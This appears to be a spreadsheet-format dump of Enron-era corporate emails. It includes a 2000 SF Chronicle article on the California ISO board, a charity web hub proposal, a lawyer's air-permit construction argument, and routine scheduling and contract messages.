http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/12/15/M_x000D_
N5101.DTL_x000D_
----------------------------------------------------------------------_x000D_
December 15, 2000 (SF Chronicle)_x000D_
Power Board's Industry Ties May Be Cut/Federal regulators consider making _x000D_
deregulation's creation independent_x000D_
Susan Sward, David Lazarus_x000D_
_x000D_
_x000D_
   As power prices skyrocket and California reels from the threat of_x000D_
blackouts, the agency charged with overseeing the state's power grid has_x000D_
come under increasing attack, and federal regulators are poised to order_x000D_
sweeping changes in its governing board._x000D_
   Ever since the Legislature created the California Independent System_x000D_
Operator four years ago, critics have lambasted the agency, saying it is_x000D_
dominated by the power industry and does not have ratepayers' interests at_x000D_
heart._x000D_
   Criticism of the ISO has grown as electricity reserves have dwindled and_x000D_
as the agency has initiated statewide energy alerts that have required_x000D_
hundreds of businesses to cut back their operations._x000D_
   "There are people on the ISO governing board who have a direct financial_x000D_
interest in the policies they set," said Severin Borenstein, a professor_x000D_
of business administration and public policy at the University of_x000D_
California at Berkeley and the director of the University of California_x000D_
Energy Institute._x000D_
   Today, the Federal Energy Regulatory Commission is expected to issue a_x000D_
ruling that would remake the ISO's 26-member board, which includes_x000D_
representatives of three investor-owned utilities, four municipal_x000D_
utilities and two power generators._x000D_
   From its high-tech headquarters in Folsom -- reminiscent of NASA's mission_x000D_
control center -- the nonprofit ISO essentially acts as traffic cop for a_x000D_
power system that serves three-quarters of the state._x000D_
   Responsible for assuring a stable source of electricity, the ISO has the_x000D_
authority to initiate emergency alerts and, if need be, rolling blackouts_x000D_
if supplies drop to near nothing. By law, the utilities and power_x000D_
generators must comply with ISO directives._x000D_
   Last month, federal regulators proposed an order calling for the ISO board_x000D_
to be replaced by seven independent members. The new board would be_x000D_
selected by the current ISO before it was replaced._x000D_
   Striving to restore order to the state's turbulent electricity market, the_x000D_
commission said an overhaul of the ISO's management would be an important_x000D_
first step toward easing the burden on consumers. CREATURE OF DEREGULATION_x000D_
   The ISO was created as part of the Legislature's deregulation of the_x000D_
state's electricity market in 1996. The Legislature set up the ISO as a_x000D_
"stakeholder board" with designated seats for participants in the energy_x000D_
marketplace._x000D_
   The theory was that those involved in the industry would be best able to_x000D_
guarantee reliable electricity for the Bay Area and the other ISO-served_x000D_
areas in California._x000D_
   "It was designed to be as neutral as possible," said Michael Shames,_x000D_
executive director of the Utility Consumers' Action Network in San Diego._x000D_
"If anything, it's turned out to be far too cozy with power generators."_x000D_
   State Sen. Debra Bowen, D-Marina Del Rey, said lawmakers were told that_x000D_
the deregulation blueprint they adopted in 1996 was a better alternative_x000D_
than more sweeping proposals being considered by the state Public_x000D_
Utilities Commission._x000D_
   Lawmakers were reassured at the time that the deregulation plan, which was_x000D_
intended to lower power prices by increasing competition, had the full_x000D_
backing of utilities, including Pacific Gas and Electric Co., power_x000D_
generators and large users of electricity._x000D_
   "You have to remember that the political climate was different then," said_x000D_
Bowen, the author of a pending measure replacing the existing ISO board_x000D_
with one appointed by the governor and independent of the industry._x000D_
   "We had a Republican Assembly and a Republican governor (Pete Wilson) with_x000D_
(his) appointees on the PUC with a free market point of view," Bowen said._x000D_
"The bargaining position of the ratepayers and consumer groups was not_x000D_
strong." PRIVATE COMPANIES' LEVERAGE_x000D_
   Doug Heller, assistant director of the Foundation for Consumer and_x000D_
Taxpayer Rights, said the Legislature set up the ISO the way it did_x000D_
because "it and the regulators were so transfixed with the idea of the_x000D_
free market that they ignored the tremendous leverage they were handing_x000D_
over to the private energy companies."_x000D_
   He added, "Because the ISO has a mandate to keep the lights on and procure_x000D_
power when the utilities are short, this energy industry-dominated board_x000D_
has used its mandate as justification for gouging consumers."_x000D_
   If the prices currently being paid for electricity are sustained over_x000D_
time, Heller said ratepayers would have an average monthly bill of $620_x000D_
and a small business paying a $1,000 monthly electricity tab could see its_x000D_
bill jump to $10,000 based on current energy market prices._x000D_
   Federal regulators almost certainly will not let this happen. They are_x000D_
expected to announce measures today intended to keep wholesale prices_x000D_
stable and thus protect users from sharp increases in their power bills._x000D_
   The ISO is currently chaired by Jan Smutny-Jones, executive director of_x000D_
the Independent Energy Producers Association, a trade association whose_x000D_
members generate about 24,000 megawatts of power in California._x000D_
   The board's members include representatives from two power generators,_x000D_
Dynegy Inc. and an affiliate of Florida Power and Light; the state's three_x000D_
investor-owned utilities, PG&amp;E, Southern California Edison and San Diego_x000D_
Gas and Electric; and four municipal utilities serving Los Angeles,_x000D_
Sacramento, Silicon Valley and several Southern California communities._x000D_
   UC's Borenstein said the ISO board should be constituted along the lines_x000D_
of New England's power agency where "you go out and find independent_x000D_
experts in power, finance and economics. New England has had its ups and_x000D_
downs, but I think there is a trust the New England board is acting in the_x000D_
best interests of consumers." POWER PRICING GATEKEEPER_x000D_
   Mike Florio, an attorney for The Utility Reform Network in San Francisco_x000D_
and a member of the ISO board, said that although the composition of the_x000D_
ISO board is only one element of the California energy crisis, the ISO "is_x000D_
at the crux of the matter because it establishes and administers the state_x000D_
market rules that determine how pricing gets done._x000D_
   "The ISO has been a law to itself -- with its attitude being: 'We keep the_x000D_
lights on, we know what's going on and others should butt out,' " he said._x000D_
   If federal regulators order an overhaul of the ISO today, "that may just_x000D_
be the beginning of the battle," Florio said. "If the changes they order_x000D_
don't offer customers relief from the extremely high prices, TURN and_x000D_
others will call for the state to buy the transmission system from the_x000D_
utilities as a means of wrestling back control from FERC."_x000D_
   For his part, the consumer network's Shames is proposing a merger of the_x000D_
ISO and the California Power Exchange, which coordinates the wholesale_x000D_
market, thereby creating a "superagency" with full powers of oversight and_x000D_
enforcement._x000D_
   Yesterday, the idea of making the ISO board independent picked up some_x000D_
utility support as well. PG&amp;E, which serves millions of customers in_x000D_
Northern and Central California, issued a statement that "to restore_x000D_
public confidence, we agree with state and federal officials that the ISO_x000D_
board needs to be independent."_x000D_
   In any case, the ISO is not without its defenders. Barbara Barkovich, an_x000D_
ISO board member who is a San Rafael consultant to large industrial_x000D_
customers, said some of the criticism of the ISO has been unfair._x000D_
   "There are larger market forces at work here: Clearly, we have a tight_x000D_
supply situation compared to demand -- which means there will always be_x000D_
upward pressure on prices," Barkovich said. "We have had a situation where_x000D_
prices out of state have recently been very high, meaning when anyone is_x000D_
selling, they will go where prices are the highest." POWERFULLY NOBLE_x000D_
CAUSE_x000D_
   For its part, she said, the ISO "has seen its role as doing everything it_x000D_
could to keep the lights on rather than have blackouts."_x000D_
   Others say the ISO simply does not have sufficient enforcement powers to_x000D_
make its orders stick in a volatile energy market._x000D_
   "The ISO is a flawed institution, but it is not responsible for the_x000D_
shortages," said Shames of the Utility Consumers' Action Network._x000D_
   Such assertions do not halt the drive to reform the ISO's makeup._x000D_
   Assemblyman Fred Keeley, D-Monterey, is the author of one of several bills_x000D_
now pending in the Legislature that would give Gov. Gray Davis authority_x000D_
to appoint both a new ISO and a revamped Power Exchange._x000D_
   But he cautioned that if an ISO restructuring is all that happens, "We_x000D_
might as well do nothing. It is only one element of the solution." MORE_x000D_
REFORMS NEEDED_x000D_
   Keeley said that for California to work through its energy crisis, several_x000D_
major reforms must be put in place, including energy conservation moves,_x000D_
as the state's population climbs by as much as 600,000 a year._x000D_
   One area crying out for attention, Keeley said, "is the demand side of the_x000D_
market. When California found itself in an energy crisis in the 1970s, it_x000D_
took good action on solar, renewable sources of energy, pricing and tax_x000D_
actions in the law and do on."_x000D_
   But he said that many of those changes have been tossed out or whittled_x000D_
away in the intervening decades._x000D_
   The Legislature also needs to look at the possibility of "the public_x000D_
having some generation assets under its control -- for example, the_x000D_
hydroelectric assets PG&amp;E now has up for sale," Keeley said._x000D_
   "PG&amp;E's assets on Northern California rivers is the largest group of_x000D_
hydroelectric assets under one ownership in the state," he said. "Public_x000D_
ownership of these hydroelectric assets is preferable to private ownership_x000D_
because those assets in public ownership would mean lower rates for_x000D_
consumers."_x000D_
   Whatever course the Federal Energy Regulatory Commission and state_x000D_
lawmakers take, the stakes are undeniably high._x000D_
   "If this conflict is allowed to continue," Bowen wrote FERC Chairman James_x000D_
Hoecker last month, ". . . then we have failed our duty to Californians."_x000D_
_x000D_
California Power ShuffleHere is how California's electricity distribution_x000D_
system is set up and what steps the regulatory body can take in times of_x000D_
extreme need..ISO statsVolume: 164 billion kilowatt hours a year Size:_x000D_
124,000 sq. miles, or 75 percent of state.Day-by-day shortage The ISO_x000D_
forecasts electricity usage throughout the state and monitors actual peak_x000D_
usage..Stages of emergencyThe stages of electrical power emergencies in_x000D_
California:Stage 1: Declared when the state's operating reserves of energy_x000D_
dip below 7 percent. All power consumers are asked to conserve_x000D_
energy.Stage 2: Declared when operating reserves fall below 5 percent._x000D_
Customers who have gotten lower rates for agreeing to go off-line when a_x000D_
power crunch hits are ordered to reduce or shut off their power.Stage 3:_x000D_
Declared when operating reserves fall below 1.5 percent. Rotating_x000D_
blackouts could result, with power to different areas temporarily cut_x000D_
off..COMPANIES THAT OPERATE WITHIN THE ISO:Pacific Gas &amp; ElectricSouthern_x000D_
California EdisonSan Diego Gas &amp; Electric.Independent System OperatorA_x000D_
not-for-profit corporation that ensures a competitive market for_x000D_
electricity and controls the integrity of the state's strained power_x000D_
grid..Remedies for a Stage 3 alertThe ISO can order the state to conserve_x000D_
power during a Stage 3 alert by:Asking large facilities, such as a mine or_x000D_
water pump, to shut down for a day to lessen demand. .Depriving some areas_x000D_
of power in order to maintain others by initiating rotating blackouts or_x000D_
brownouts -- temporary sags in power..Source: California Independent_x000D_
System OperatorAssociated Press Graphic_x000D_
   Chronicle research librarian Johnny Miller contributed to this report. /_x000D_
Email Susan Sward at ssward@sfchronicle.com and David Lazarus at_x000D_
dlazarus@sfchronicle.com._x000D_
----------------------------------------------------------------------_x000D_
Copyright 2000 SF Chronicle</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 20:02:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maryt@houston.rr.com'})</t>
  </si>
  <si>
    <t>frozenset({'jane.jones@enron.com', 'betsy.poland@enron.com', 'cristi.harvey@enron.com', 'patricia.cornelius@enron.com', 'gayla.whitaker@enron.com', 'aletta.moore@enron.com', 'sally.beck@enron.com', 'kim.dallefeld@enron.com', 'leslie.mcmanus@enron.com', 'karin.werlang@enron.com', 'julie.blackman@enron.com', 'adrianna.ay@enron.com', 'donna.daman@enron.com', 'wendy.lyons@enron.com'})</t>
  </si>
  <si>
    <t>National Web Hub info</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
  _x000D_
Here are the basic elements of the hub concept.  _x000D_
 _x000D_
NCL, Inc. at www.nationalcharityleague.org   will be the umbrella site.  Each  chapter that participates will have a web site under this umbrella.  The name will be www.nationalcharityleague/chaptername.org .  The chapters will be given a choice of 4  templates that will allow them to pick colors and graphics that they like.  Each chapter site will contain:_x000D_
1.      A  front page:  a brief section about  their chapter that can be reached by anyone searching for National Charity  League.  This will be the only  public area._x000D_
2.      A  password entry area that will be based on the chapter database or list of  members that they want to have access to their site.  The password entry area will have an  area that members can update their information (change of address, e-mail,  etc.)._x000D_
3.      The  password protected area will include:_x000D_
a.        A member listing with address, phone numbers, etc._x000D_
b.       Philanthropies and schedules for activities_x000D_
c.        Calendar_x000D_
d.       Meeting Schedule (Patroness and Ticktocker)_x000D_
e.        Newsletters_x000D_
f.         Bylaws (searchable by keyword)_x000D_
g.        Ticktocker Procedures (searchable by keyword)_x000D_
h.        Standing Rules (searchable by keyword)_x000D_
i.          Hours (this will be a database collection area that each chapter member  will be allowed to submit hours through.   The hours chair(s) will be able to ask for and get a report of all hours  submitted.  The individual members  will also be able to get a summary of their hours as well.  _x000D_
j.         And finally, a chat area for chapter members._x000D_
 _x000D_
The cost:  A  one-time site set-up fee of approximately $500 (this could be slightly more due  to the uncertainty of additional information that chapters may want on their  site) and a $69.95 per month web hosting fee.  _x000D_
 _x000D_
I will train the chapter designated person on how to load  their information onto the web area via a manual that I will prepare and at  convention and phone calls.  Our  service provider will handle technical support for non-NCL content related  problems.  Once the templates are  designed and tested, chapter sites could be ready for uploading within 2  weeks.  The template design and  testing will be done over the next several months if there is sufficient  commitment from chapters.  I'll pick  a date of January 1, 2002 for chapter sites to be ready.  It could be sooner but I have to make  sure that there are enough chapters interested before committing my time to this  project.   _x000D_
 _x000D_
I can't think of anything else on this subject._x000D_
 _x000D_
NCL, Inc. Secure Area_x000D_
Each President will be given a set of user names and  passwords for her Board of Directors.   If they are not available for your meeting, I will send them to each  Board President via mail as soon as they are available.  I am meeting with our hosting company  next week and we will generate the ids and passwords then.  The NCL, Inc. Secure area will have a  directory, the National Reference Manual, NELLIE, Standard Form Bylaws and  Ticktocker Procedures, a Calendar with meeting places and phone numbers,  information on the chapters (including some names and numbers) and a variety of  forms.  There may be other things as  the need arises.    Target  date:  November 1, 2001._x000D_
 maryt@houston.rr.com </t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 01:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vwolf@swlaw.com'})</t>
  </si>
  <si>
    <t>frozenset({'jerry.d.martin@enron.com', 'ruth.jensen@enron.com', 'larry.campbell@enron.com', 'shead@ensr.com', 'william.kendrick@enron.com', 'louis.soldano@enron.com', 'dan.pribble@enron.com', 'richard.melton@enron.com', 'arnold.l.eisenstein@enron.com', 'john.shafer@enron.com'})</t>
  </si>
  <si>
    <t>Red Rock/DEQ: pre-permit construct</t>
  </si>
  <si>
    <t xml:space="preserve">If the bottom line is being able to start critical construction activities as _x000D_
quickly as possible, rather than properly characterizing the type of permit _x000D_
revision, we have developed an argument, based on the Clean Air Act (which is _x000D_
the source for Arizona's air program), that would allow construction to _x000D_
commence shortly after notice, without the need for a permit. Of course, TWP _x000D_
has already submitted a permit revision application and would be willing to _x000D_
see this process through to completion as long as TWP could begin _x000D_
construction promptly and plan on beginning operation of the new equipment _x000D_
when the permit is finallly issued, presumably in the spring._x000D_
_x000D_
The argument goes as follows: under CAA sec 502(b)(10), 42 USC 7661a(b)(10),  _x000D_
a state program needs to allowchanges within a permitted facility if the _x000D_
changes are not "modifications" and do not exceed the emissions allowable _x000D_
under the permit. A "modification" is defined as "any physical change in, or _x000D_
change in the method of operation of, a stationary source which increases the _x000D_
amount of any air pollutant emitted by such source or which results in the _x000D_
emission of any air pollutant not previously emitted."_x000D_
_x000D_
 Someone should confirm the technical status of the equipment changes and _x000D_
whether they meet the criteria. This may be something to point out to Nancy _x000D_
how she can exercise her discretion to get us where we need to go. Nancy can _x000D_
give this approval after Shudeish completes his calculations confirming TWP's _x000D_
netting calculations._x000D_
_x000D_
Van_x000D_
_x000D_
The information contained in this electronic mail message is confidential _x000D_
information intended only for the use of the individual or entity named _x000D_
above, and may be privileged.  If the reader of this message is not the _x000D_
intended recipient or the employee or agent responsible to deliver it to the _x000D_
intended recipient, you are hereby notified that any dissemination, _x000D_
distribution or copying of this communication is strictly prohibited.  If you _x000D_
have received this communication in error, please immediately notify us by _x000D_
telephone (602-382-6000), and delete the original message.  Thank you._x000D_
_x000D_
G. Van Velsor Wolf Jr._x000D_
Snell &amp; Wilmer L.L.P._x000D_
One Arizona Center_x000D_
Phoenix , Arizona 85004-2202_x000D_
602.382.6201 (direct)_x000D_
602.382.6000 (main number)_x000D_
602.382.6070 (fax)_x000D_
vwolf@swlaw.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 13:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Weekly Staff meeting?</t>
  </si>
  <si>
    <t xml:space="preserve">yep._x000D_
_x000D_
_x000D_
_x000D_
	Joseph Alamo_x000D_
	07/10/2001 07:31 PM_x000D_
		_x000D_
		 To: Jeff Dasovich/NA/Enron, Susan J Mara/NA/Enron_x000D_
		 cc: _x000D_
		 Subject: Re: Weekly Staff meeting?_x000D_
_x000D_
_x000D_
so -- 8:30 Thursday okay with both of you??_x000D_
_x000D_
_x000D_
From: Jeff Dasovich on 07/10/2001 12:07 PM CDT_x000D_
Sent by: Jeff Dasovich_x000D_
To: Susan J Mara/NA/Enron@ENRON_x000D_
cc: Alan Comnes/ENRON@enronXgate, Joseph Alamo/NA/Enron@ENRON, Paul _x000D_
Kaufman/Enron@EnronXGate _x000D_
_x000D_
Subject: Re: Weekly Staff meeting?  _x000D_
_x000D_
That's true, but we're trying to find substantive reasons for having the _x000D_
meeting...._x000D_
_x000D_
_x000D_
_x000D_
	Susan J Mara_x000D_
	07/10/2001 12:05 PM_x000D_
		_x000D_
		 To: Joseph Alamo/NA/Enron@Enron_x000D_
		 cc: Alan Comnes/ENRON@enronXgate, Jeff Dasovich/NA/Enron@Enron_x000D_
		 Subject: Re: Weekly Staff meeting?_x000D_
_x000D_
Paul specifically told us to have one_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	Joseph Alamo_x000D_
	07/10/2001 09:41 AM_x000D_
		 _x000D_
		 To: Susan J Mara/NA/Enron, Jeff Dasovich/NA/Enron, Alan _x000D_
Comnes/ENRON@enronXgate_x000D_
		 cc: _x000D_
		 Subject: Weekly Staff meeting?_x000D_
_x000D_
_x000D_
Did you folks want to try to have a Staff meeting/call this week?_x000D_
or would you rather let it go until Paul returns?_x000D_
_x000D_
Pls advise,_x000D_
Thanks,_x000D_
Joseph_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 01:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com', 'heather.kroll@enron.com'})</t>
  </si>
  <si>
    <t>FuelCell Negotiations</t>
  </si>
  <si>
    <t xml:space="preserve">fyi.  I'll respond later.  Back to the contract...._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/11/2000 08:16 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Scott Healy @ ECT                           10/11/2000 08:03 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Jeffery Ader/HOU/ECT@ECT, Stephen Plauche/Corp/Enron@Enron _x000D_
_x000D_
Subject: FuelCell Negotiations_x000D_
_x000D_
I spoke to Fuel Cells and here is my suggested schedule for the negotiations:_x000D_
_x000D_
October 11, 2000--We redraft purchase order and send it to FuelCells._x000D_
_x000D_
October 12, 2000-We hold a conference call with FuelCells in the morning to _x000D_
walk them through the P.O. and give them our thoughts (probable length 1-1.5 _x000D_
hours).  We continue to work on P.O._x000D_
 _x000D_
October 15, 2000--Kay flies to New York.  We have a conference call with _x000D_
FuelCells in the afternoon to discuss their initial comments on P.O.  Kay _x000D_
meets with Bingham to get work assignments started (i.e., permitting work, _x000D_
start drafting construction agreement, changes to Development _x000D_
Agreement...etc).  Scott takes 'red-eye" flight to N.Y._x000D_
_x000D_
October 16, 2000--Meet with FuelCells in Bingham's offices.  Continue _x000D_
negotiations on P.O._x000D_
_x000D_
October 17-19, 2000--To be determined based on progress of meetings.  If need _x000D_
be, we could continue negotiations in Houston or have Kay patch in by the _x000D_
telephone or do all the negotiations by telephone.  _x000D_
_x000D_
What are your thoughts?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 10:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DTE Energy Trading</t>
  </si>
  <si>
    <t>When you get back in we need to talk about this cpy.  My records had them _x000D_
shut down for power, they called about contract issue and wanting to trade in _x000D_
all products areas, and speaking to Shari and checking your notes, you had _x000D_
them as open.  Since they haven't traded power yet, I had Frank shut them _x000D_
down until I confirm with you they're OK and under what contracts._x000D_
_x000D_
Talk to you when you get back...</t>
  </si>
  <si>
    <t>TECO meeting eb3143b</t>
  </si>
  <si>
    <t xml:space="preserve">CALENDAR ENTRY:	INVITATION_x000D_
_x000D_
Description:_x000D_
	TECO meeting eb3143b_x000D_
_x000D_
Date:		4/9/2001_x000D_
Time:		1:00 PM - 2:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Stacey W White_x000D_
_x000D_
Detailed Description:_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 09:06:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Staff Meeting</t>
  </si>
  <si>
    <t>TJae_x000D_
_x000D_
Can you mark me down for a half day (sick day) for today. Was feeling terri=_x000D_
ble this morning._x000D_
_x000D_
_x000D_
Harry_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Black, Tamara Jae =20_x000D_
Sent:=09Tuesday, October 23, 2001 4:01 PM_x000D_
To:=09/o=3DENRON/ou=3DNA/cn=3DRecipients/cn=3Dnotesaddr/cn=3Da478079f-55e1f=_x000D_
3b0-862566fa-612229; Abler, William; Aggarwal, Anubhav; Allen, Diana; Arora=_x000D_
, Harry; Bailey, Debra; Ballato, Russell; Ballinger, Ted; Baughman Jr., Don=_x000D_
; Benchluch, Moises; Benjelloun, Hicham; Benson, Robert; Bentley, Corry; Bl=_x000D_
ack, Tamara Jae; Blaine, Jay; Bolt, Laurel; Broderick, Paul J.; Broussard, =_x000D_
Richard; Burnett, Lisa; Campbell, Larry F.; Capasso, Joe; Carson, Mike; Che=_x000D_
n, Alan; Choate, Jason; Cline, Kevin; Collins, Dustin; Comeaux, Keith; Coul=_x000D_
ter, Kayne; Davis, Mark Dana; Day, Smith L.; Dean, Clint; Decook, Todd; Eme=_x000D_
sih, Gerald; Errigo, Joe; Forney, John M.; Freije, William; Garcia, Miguel =_x000D_
L.; Gilbert, Gerald; Gilbert-smith, Doug; Giron, Gustavo; Greer, Andrew; Gu=_x000D_
aly, Jaime; Guerra, Claudia; Gulmeden, Utku; Gupta, Gautam; Ha, Amie; Hanse=_x000D_
, Patrick; Hernandez, Juan; Imai, Rika; Ingram, David; Jenkins IV, Daniel; =_x000D_
Kaniss, Jason; King, Jeff; Kinser, John; Larkworthy, Carrie; Laurent, Dean;=_x000D_
 Laverell, Justin; Lenartowicz, Chris; Lorenz, Matt; Lotz, Gretchen; Lowell=_x000D_
, Thomas; Mack, Iris; Mahajan, Ashish; Makkai, Peter; Marquez, Mauricio; Ma=_x000D_
skell, David; May, Tom; McElreath, Alexander; Miller, Jeffrey; Oh, Seung-Ta=_x000D_
ek; Olinde Jr., Steve; Pace, Andy; Padron, Juan; Pan, Steve; Philip, Willis=_x000D_
; Podurgiel, Laura; Poppa, John D.; Presto, Kevin M.; Quenet, Joe; Rawal, P=_x000D_
unit; Rodriquez, Andy; Rogers, Benjamin; Rust, Bill; Ryan, David; Saibi, Er=_x000D_
ic; Schiavone, Paul; Schneider, Bryce; Seely, Michael; Serio, Erik; Shoemak=_x000D_
e, Lisa; Stalford, Robert; Stepenovitch, Joe; Sturm, Fletcher J.; Symms, Ma=_x000D_
rk; Tamma, Ramanarao; Thomas, Paul D.; Trejo, Reese; Valdes, Maria; Vernon,=_x000D_
 Clayton; Wang, Steve; Williams, Ryan; Willis, Cory; Zipperer, Mike; Baughm=_x000D_
an, Edward D.; Carroll, Lex; Clynes, Terri; Dalton III, Oscar; Forster, Dav=_x000D_
id; Kelly, Mike E.; Ratliff, Beau; Sewell, Doug; Valderrama, Larry_x000D_
Subject:=09Staff Meeting_x000D_
_x000D_
Please mark your calendar for a mandatory staff meeting with Kevin Presto t=_x000D_
omorrow, Oct. 24th from 4- 5pm in room 30c1._x000D_
_x000D_
Thanks=20_x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 05:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PGL Analyst Report</t>
  </si>
  <si>
    <t>Gregg, please send a hard copy - the pdf file can not be opened on ENA _x000D_
systems in Houston._x000D_
_x000D_
Thanks_x000D_
Delainey</t>
  </si>
  <si>
    <t>Mon, 20 Aug 2001 09:06:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'claudia.guerra@enron.com'})</t>
  </si>
  <si>
    <t>RE: Keenon C. Wilborn</t>
  </si>
  <si>
    <t xml:space="preserve">WAS THIS NOT CANCELLED?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Guerra, Claudia  _x000D_
Sent:	Monday, August 20, 2001 11:04 AM_x000D_
To:	Forney, John M.; Will, Lloyd; Day, Smith L._x000D_
Cc:	Black, Tamara Jae; Delgado, Lydia_x000D_
Subject:	Keenon C. Wilborn_x000D_
_x000D_
Lydia in recruiting has just informed me that Keenon C. Wilborn will be able to make it for his interview today.  So I hope you can still interview him at_x000D_
the same time._x000D_
_x000D_
Thank you,_x000D_
Claudia_x000D_
x34588_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This is the schedule for Keenon C. Wilborns interview for today._x000D_
_x000D_
John Forney: 1:00 pm - 1:30 pm  EB3127_x000D_
_x000D_
Lloyd Will:  1:30 pm - 2:00 pm   EB3127_x000D_
_x000D_
Smith Day:  2:00 pm - 2:30 pm  EB3127_x000D_
_x000D_
Thank you,_x000D_
Claudia Guerra_x000D_
x34588_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 19:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/10/01; HourAhead hour: 3;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/10/01; HourAhead hour: 3;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041003.txt</t>
  </si>
  <si>
    <t>frozenset({'suzanne.farrow@enron.com'})</t>
  </si>
  <si>
    <t>Re: Wharton Recruiting</t>
  </si>
  <si>
    <t>Suzanne,_x000D_
 I'm a '97 graduate and interested in recruiting this year. However, I'm out _x000D_
in Portland, so I will be unable to attenfd any meetings in Houston. Let me _x000D_
know how I can help. I would like to go out there when you go. Let me know _x000D_
what our schedule is. Thanks._x000D_
_x000D_
Bob Badeer_x000D_
_x000D_
503 464 3926</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 01:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EnronOnline-Entergy</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your help in getting this done.  You're a star!_x000D_
---------------------- Forwarded by Tana Jones/HOU/ECT on 03/28/2000 09:02 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Cyndie Balfour-Flanagan@ENRON_x000D_
03/27/2000 05:03 PM_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Stacy E Dickson/HOU/ECT@ECT _x000D_
Subject: Re: EnronOnline-Entergy  _x000D_
_x000D_
_x000D_
CES CP Name per CES data: Entergy Power (Marketing), Corp._x000D_
   _x000D_
CP Legal Name (as appearing on contract): Entergy Power Marketing Corp._x000D_
Contract Title (CES):    "Master Gas Purchase and Sale Agreement"_x000D_
      (In Global as 'Master Purchase/Sale Firm &amp; Spot')_x000D_
Contract Date:     03/01/1997_x000D_
_x000D_
CP Legal Name (as appearing on contract): Entergy Power Marketing Corporation_x000D_
Contract Title (CEM):    GISB_x000D_
Contract Date:     04/01/1999_x000D_
      _x000D_
_x000D_
_x000D_
_x000D_
Stacy E Dickson@ECT_x000D_
03/27/2000 04:46 PM_x000D_
To: Cyndie Balfour-Flanagan/Corp/Enron@ENRON_x000D_
cc: Tana Jones/HOU/ECT@ECT _x000D_
_x000D_
Subject: EnronOnline-Entergy_x000D_
_x000D_
Would you supply Tana Jones with the exact name and date of the Master Firm _x000D_
and the Gisb with Entergy Power that orginally came from Columbia Energy._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Stacy_x000D_
---------------------- Forwarded by Stacy E Dickson/HOU/ECT on 03/27/2000 _x000D_
04:44 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Tana Jones                           03/27/2000 10:50 AM_x000D_
	_x000D_
_x000D_
To: Leslie Hansen/HOU/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT_x000D_
cc: Carol St Clair/HOU/ECT@ECT _x000D_
Subject: EnronOnline-Entergy_x000D_
_x000D_
Entergy Power Marketing Corp. has applied for a Password and has asked us to _x000D_
give them a "comfort letter" stating that the current trading with them will _x000D_
go under the respective master for the product and not the online GTC.  I _x000D_
have spoken to Credit and we are trading financial gas, physical gas, and _x000D_
physical power (through EPMI).  Can you please let me know first, if you have _x000D_
a master agreement agreement in place with this counterparty would it govern _x000D_
the product or would we need to use an override letter and if the master _x000D_
agreement will govern the trades, please provide me the exact name, parties _x000D_
and date of the contract.  Obviously, as usual with online matters, this is a _x000D_
RUSH._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 04:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I was trying to tell you that the blonde chick from Donna's group is down _x000D_
here.  The woman that's always whining about something.  She's driving me _x000D_
nuts.  That and the fact that I had a long meeting this morning with your _x000D_
other buddy, Chris Disable.  All we did was go in circles for about 45 _x000D_
minutes._x000D_
_x000D_
How's your day going?_x000D_
_x000D_
REALTRORARR (I just wanted to have as many initials as you.)</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 11:33:25 -0800 (PST)</t>
  </si>
  <si>
